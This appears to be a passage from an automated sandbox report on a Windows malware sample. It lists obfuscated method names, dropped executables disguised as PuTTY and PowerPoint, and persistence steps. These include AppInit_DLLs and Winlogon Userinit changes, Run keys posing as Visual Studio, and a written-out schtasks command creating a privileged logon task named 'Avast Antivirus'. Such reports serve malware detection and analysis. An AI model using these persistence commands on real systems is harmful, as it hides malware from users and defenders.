Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, KaCEkWzArz.csHigh entropy of concatenated method names: 'TRJrolTMln', 'tonIFMNIZBwi', 'MKXzNLdyFCKiXye', 'BucahgNQbRnniZ', 'XiNfeOUyZ', 'eolcahOiV', 'HTIOfxGXwYq', 'frnzKTAYhv', 'QDsboAkZ', 'NADDayzg'
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, vzOQfCjdwrwlD.csHigh entropy of concatenated method names: 'DZSBOsEdSkftm', 'CHkhhdMlBNYW', 'xQXiDVjowcoBI', 'RgdllPHbpHPD', 'XRYFcrMHNvC', 'XCoFfwgZxuFX', 'mGZVbPTAvMWX', 'LJwYElbJOMT', 'KKieccLBcpl', 'llfibbqRhIkXd'
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, wgtJFxwmDCkn.csHigh entropy of concatenated method names: 'bqEIfXfZOiYonfU', 'nuaTxiBEdpUSV', 'ZXsCuXbSrjW', 'hyVVRScD', 'HJTAtpzfpD', 'DpIBwllwHV', 'rxtACjIY', 'pRIRNYBA', 'bnBgIzrpUYfgf', 'uESWGsmQWRAXmhq'
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, WfcSxBiJWHQqTp.csHigh entropy of concatenated method names: 'PROyGYfLwtjlP', 'HShuatetG', 'uCbiJigZKDT', 'HxqQqUgYOQSyPoi', 'swEWKuEExwBNNJa', 'rILkEKCKM', 'FdjcSVAkgOzxn', 'tlSuSTLEq', 'HGdyrituJ', 'paUVdgNdcLMt'
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, LtuDkZEKFIyjL.csHigh entropy of concatenated method names: 'zIEsmyYznoUPjWT', 'ZPaJmzDKLHfp', 'hMOQgSAS', 'UGOLGFiVphrci', 'IBJAEtgeTivGc', 'yDDSKovU', 'atycqSyybydGPWS', 'YEpnfQzccXmdYRu', 'nGjHGRqMUjTIyy', 'gkXmjFhPKtVzT'
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, uBecUVPQ.csHigh entropy of concatenated method names: '_003CStart_003Eb__1_0', '_003CUninstall_003Eb__2_0', '_003CLoopInstall_003Eb__7_0', '_003CStartAsBypass_003Eb__10_0', 'AaqmPntZxR', 'BYucXNJtAttu', 'fCgVMnQqp', 'jZNmaLjR', 'jSzWGBFGMVP', 'GfeHMHXNKBq'
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, rTbUtmWcnO.csHigh entropy of concatenated method names: 'ETuZUDsFHdsPqem', 'WQoYDPhzWL', 'NHsdoETuthXISt', 'YkyElqHXzL', 'pvomvDJNfyOzEKW', 'thzIVfnqxASaz', 'ktSpPYGH', 'UzFORJkutOGOq', 'DcKHyouk', 'NZOVhOvydlufJ'
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, kICtJPxSafoGvi.csHigh entropy of concatenated method names: 'izoVMEnyZoDuo', 'ZzsriRjjE', 'MObKRbqhKZYMlY', 'mxKcEGVJI', 'gvPMQxzu', 'JxcchyxVkPlMOTi', 'UZGAjqFTJlfbVtb', 'SmPKJUcdGkl', 'WoRcgQwXstPSrJT', 'TWAqnMubEYmzwdu'
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, bNrRgbuKfhLKh.csHigh entropy of concatenated method names: 'dcgBjalp', 'QTRdGVQS', 'MNYAcNFsv', 'ngqakeeDYY', 'XzmIbxPynoOP', 'xUecATvq', 'TBYZthybSsue', 'OmrAPqtHdZRpcP', 'BCEcosfkkBEizMW', 'UWIGslzDFxX'
Source: 19.2.pto2q1ow.nf5.exe.12f8ceb0.0.raw.unpack, KPKTbmek.csHigh entropy of concatenated method names: 'ywDpYFYr', 'iSYaQgfunkCfdU', 'LGzzzbmHVN', 'sIvgJerM', 'udjzdohzui', 'UcoeSGZrOwK', 'MKoWyGaX', 'RCUiWzWLunNnrk', 'UROCFzyVjZ', 'opRisTKhDaT'
Source: xdwdPutty.exe.33.dr, YeASamleCu.csHigh entropy of concatenated method names: 'xnIxVRYrPBFYu', 'bdMoOrQxtvgEAC', 'aaKjZcdK', 'koKrGQSFGdzIY', 'oCRzuMRRQWnpbv', 'VNyTdDahZrdday', 'DvBkWgHcjxR', 'XnDRpWQkPBp', 'nNVsIQjrStTsoqZ', 'OkOVMjCtV'
Source: xdwdPutty.exe.33.dr, BepYSwIiYsKTkc.csHigh entropy of concatenated method names: '_003CScreenShot_003Eb__16_0', 'hgYqlsJf', 'sLrZOuAb', 'kOWJOWvoQlcxdqy', 'DFyYevrypfGFjUe', 'iYAOjYSCuxcYDC', 'VsaLoCDQoW', 'UiPqEvHkOEq', 'PenvdgTTvmQlM', 'JppfHLrLD'
Source: xdwdPutty.exe.33.dr, gEjezvihrA.csHigh entropy of concatenated method names: 'SNPMxFexzSMQ', 'gDOlHAunu', 'YzPPDudfl', 'vNRfanEABU', 'TnWxvgwZqFpXCrN', 'paCVmbxQTmjLT', 'umZLELsRHOgGvNG', 'PnNGOazzMspGeJ', 'lGuLDxqnBpYTnog', 'kKdWwyNhUmay'
Source: xdwdPutty.exe.33.dr, WkKaRrezv.csHigh entropy of concatenated method names: 'VsYjwdcp', 'jAGsauzxlaBtYm', 'uBIfrUJxdEg', 'ROggXEKEH', 'skfRutZuJx', 'ypvVxxTaC', 'nujiiFtdoNhS', 'JYzaaPYjvjES', 'kLZHreEmFpw', 'LofQUjZgLlxyX'
Source: xdwdPutty.exe.33.dr, xeRJPXmwavvZh.csHigh entropy of concatenated method names: 'VuqpJUTheDe', 'znrPvdHAVP', 'cAyIiGOFzkOT', 'HOUaRQzOf', 'XzFKzRRgBGUNoLM', 'bQxfglThIhJhj', 'PMxBaJdw', 'niDNNpuaJN', 'ojQARmfXCSIjw', 'qIPmkDHfCJxdXGs'
Source: xdwdPutty.exe.33.dr, rZjCSSmKXaUqXO.csHigh entropy of concatenated method names: 'dlETBnKBmzDv', 'qxyyxYISrIfceYU', 'mEonbfpiuJAgXx', 'OXrTZcVt', 'FJldZrWPqJAuPIT', 'HQDnXcvuE', 'FmEuQQLohR', 'MIDmlqOxJzPYIRM', 'FbdOrYJmkK', 'tjiaaBSvHzAmmhx'
Source: xdwdPutty.exe.33.dr, KaCEkWzArz.csHigh entropy of concatenated method names: 'TRJrolTMln', 'tonIFMNIZBwi', 'MKXzNLdyFCKiXye', 'BucahgNQbRnniZ', 'XiNfeOUyZ', 'eolcahOiV', 'HTIOfxGXwYq', 'frnzKTAYhv', 'QDsboAkZ', 'NADDayzg'
Source: xdwdPutty.exe.33.dr, vzOQfCjdwrwlD.csHigh entropy of concatenated method names: 'DZSBOsEdSkftm', 'CHkhhdMlBNYW', 'xQXiDVjowcoBI', 'RgdllPHbpHPD', 'XRYFcrMHNvC', 'XCoFfwgZxuFX', 'mGZVbPTAvMWX', 'LJwYElbJOMT', 'KKieccLBcpl', 'llfibbqRhIkXd'
Source: xdwdPutty.exe.33.dr, wgtJFxwmDCkn.csHigh entropy of concatenated method names: 'bqEIfXfZOiYonfU', 'nuaTxiBEdpUSV', 'ZXsCuXbSrjW', 'hyVVRScD', 'HJTAtpzfpD', 'DpIBwllwHV', 'rxtACjIY', 'pRIRNYBA', 'bnBgIzrpUYfgf', 'uESWGsmQWRAXmhq'
Source: xdwdPutty.exe.33.dr, WfcSxBiJWHQqTp.csHigh entropy of concatenated method names: 'PROyGYfLwtjlP', 'HShuatetG', 'uCbiJigZKDT', 'HxqQqUgYOQSyPoi', 'swEWKuEExwBNNJa', 'rILkEKCKM', 'FdjcSVAkgOzxn', 'tlSuSTLEq', 'HGdyrituJ', 'paUVdgNdcLMt'
Source: xdwdPutty.exe.33.dr, LtuDkZEKFIyjL.csHigh entropy of concatenated method names: 'zIEsmyYznoUPjWT', 'ZPaJmzDKLHfp', 'hMOQgSAS', 'UGOLGFiVphrci', 'IBJAEtgeTivGc', 'yDDSKovU', 'atycqSyybydGPWS', 'YEpnfQzccXmdYRu', 'nGjHGRqMUjTIyy', 'gkXmjFhPKtVzT'
Source: xdwdPutty.exe.33.dr, uBecUVPQ.csHigh entropy of concatenated method names: '_003CStart_003Eb__1_0', '_003CUninstall_003Eb__2_0', '_003CLoopInstall_003Eb__7_0', '_003CStartAsBypass_003Eb__10_0', 'AaqmPntZxR', 'BYucXNJtAttu', 'fCgVMnQqp', 'jZNmaLjR', 'jSzWGBFGMVP', 'GfeHMHXNKBq'
Source: xdwdPutty.exe.33.dr, rTbUtmWcnO.csHigh entropy of concatenated method names: 'ETuZUDsFHdsPqem', 'WQoYDPhzWL', 'NHsdoETuthXISt', 'YkyElqHXzL', 'pvomvDJNfyOzEKW', 'thzIVfnqxASaz', 'ktSpPYGH', 'UzFORJkutOGOq', 'DcKHyouk', 'NZOVhOvydlufJ'
Source: xdwdPutty.exe.33.dr, kICtJPxSafoGvi.csHigh entropy of concatenated method names: 'izoVMEnyZoDuo', 'ZzsriRjjE', 'MObKRbqhKZYMlY', 'mxKcEGVJI', 'gvPMQxzu', 'JxcchyxVkPlMOTi', 'UZGAjqFTJlfbVtb', 'SmPKJUcdGkl', 'WoRcgQwXstPSrJT', 'TWAqnMubEYmzwdu'
Source: xdwdPutty.exe.33.dr, bNrRgbuKfhLKh.csHigh entropy of concatenated method names: 'dcgBjalp', 'QTRdGVQS', 'MNYAcNFsv', 'ngqakeeDYY', 'XzmIbxPynoOP', 'xUecATvq', 'TBYZthybSsue', 'OmrAPqtHdZRpcP', 'BCEcosfkkBEizMW', 'UWIGslzDFxX'
Source: xdwdPutty.exe.33.dr, KPKTbmek.csHigh entropy of concatenated method names: 'ywDpYFYr', 'iSYaQgfunkCfdU', 'LGzzzbmHVN', 'sIvgJerM', 'udjzdohzui', 'UcoeSGZrOwK', 'MKoWyGaX', 'RCUiWzWLunNnrk', 'UROCFzyVjZ', 'opRisTKhDaT'
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\z4wwumki.3zg.exeFile created: C:\Users\user\Videos\xdwdPutty.exeJump to dropped file
Source: C:\Users\user\Desktop\ptKNiAaGus.exeFile created: C:\Users\user\xdwdPutty.exeJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeFile created: C:\Users\user\Videos\xdwdMicrosoft PowerPoint Host.exeJump to dropped file
Source: C:\Users\user\Desktop\ptKNiAaGus.exeFile created: C:\Users\user\xdwdPutty.exeJump to dropped file

Boot Survival

barindex
Allows loading of unsigned dll using appinit_dll
Source: C:\Users\user\Desktop\ptKNiAaGus.exeRegistry value created: RequireSignedAppInit_DLLs 0Jump to behavior
Creates an undocumented autostart registry key
Source: C:\Users\user\Desktop\ptKNiAaGus.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows AppInit_DLLsJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows LoadAppInit_DLLsJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon UserinitJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon UserinitJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon UserinitJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon UserinitJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon UserinitJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon UserinitJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon UserinitJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon UserinitJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon UserinitJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon UserinitJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon UserinitJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon UserinitJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon UserinitJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon UserinitJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon UserinitJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon UserinitJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon UserinitJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon UserinitJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon UserinitJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon UserinitJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon UserinitJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon UserinitJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon UserinitJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon UserinitJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon UserinitJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon UserinitJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon UserinitJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon UserinitJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon UserinitJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Userinit
Creates multiple autostart registry keys
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Microsoft Visual Studio
Source: C:\Users\user\Desktop\ptKNiAaGus.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run xdwdsystegregreJump to behavior
Drops PE files to the user root directory
Source: C:\Users\user\Desktop\ptKNiAaGus.exeFile created: C:\Users\user\xdwdPutty.exeJump to dropped file
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Avast Antivirus" /tr "C:\Users\user\xdwdPutty.exe"
Source: C:\Users\user\Desktop\ptKNiAaGus.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run xdwdsystegregreJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run xdwdsystegregreJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Microsoft Visual Studio
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Microsoft Visual Studio
Source: C:\Users\user\Desktop\ptKNiAaGus.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE D396F3C20883A3B71244C87C537595108010239E4E17E6C09BCA83EA5A475677Jump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
